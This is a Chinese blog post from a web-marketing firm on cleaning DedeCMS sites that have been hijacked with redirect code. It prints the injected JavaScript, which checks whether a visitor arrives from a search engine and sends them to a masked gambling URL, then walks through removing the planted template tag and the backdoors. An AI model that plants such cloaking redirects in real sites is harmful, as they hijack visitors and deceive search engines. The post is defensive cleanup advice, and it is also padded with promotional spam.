织梦系统网站被劫持安装跳转代码怎么办

24小时关键词上百度首页点此查看详情
据主营万词霸屏和竞价包年的上海网络推广公司厉雷网络了解,最近很多的织梦网站被挂跳转代码。非常的可恶,这个代码在你平常浏览的情况下是没有问题的,但是百度抓取的话是博彩的网站,还可能跳转!
 
主营万词霸屏和竞价包年的上海网络推广公司厉雷网络去找了些方法供大家尝试100%可以删除掉的
 
一、首先,检测网页的index.html源码是否有异常。因为这个页面是最后生成的静态页,结果发现多了一段的js代码。
 
这个代码主要是用来做跳转的,打开源码,内容是:qq好友列表获取 
 
var d=document.referrer;
 
if(d.indexOf("baidu")>0||d.indexOf("google")>0||d.indexOf("sogou")>0||d.indexOf("bing")>0||d.indexOf("soso")>0||d.indexOf("youdao")>0||d.indexOf("zhongsou")>0)
 
{window.location.href="http://www.***.com/7y/1.asp";}
 
他会判断是否来自搜索引擎,如果来自搜索引擎,则执行跳转命令。
 
二、第二步,查看模板的index.htm文件,看对应的模板文件是什么?
 
找到了一个黑客创建的织梦标签:{dede:dinfo/},很明显就是他。
 
三、第三步,打开织梦管理后台,标签源码管理,尝试查找dinfo相关的lib文件。
 
找到对应的标签文件,对他进行删除。比如 韩式半永久培训   这个网站
 
 
四、第四步,查看黑客怎么做到的,并进行防护。
 
(第一系统后台,用户组是否多了, 第二查看所有能添加变量 第三,模块管理中是否多了东西, 第四,频道模型,第五 自定义宏标记等等.大多数情况下是plus 或者模板里面的asp或php木马,数据库里面对应的木马数据不删除,就算你删除了木马文件照样会重新生成。common.inc.php 文件也要多多留意,一般情况下 如果修改模板后仍然被改首页 有必要重新覆盖下这个文件,)
 
五、如果有权限的话最好把FTP禁止上传文件。条件允许的话

欢迎转载,本文标题:《织梦系统网站被劫持安装跳转代码怎么办》,转载请注明原文网址:http://www.13076758023.cn/anquan/20190323/768.html
请尊重我们的辛苦付出,未经允许,请不要转载上海网络推广公司厉雷网络的文章!
上一篇:关于网站被挂马的症状以及处理解决方法
下一篇:超简单方法-彻底解决网页被劫持-自由锁定主页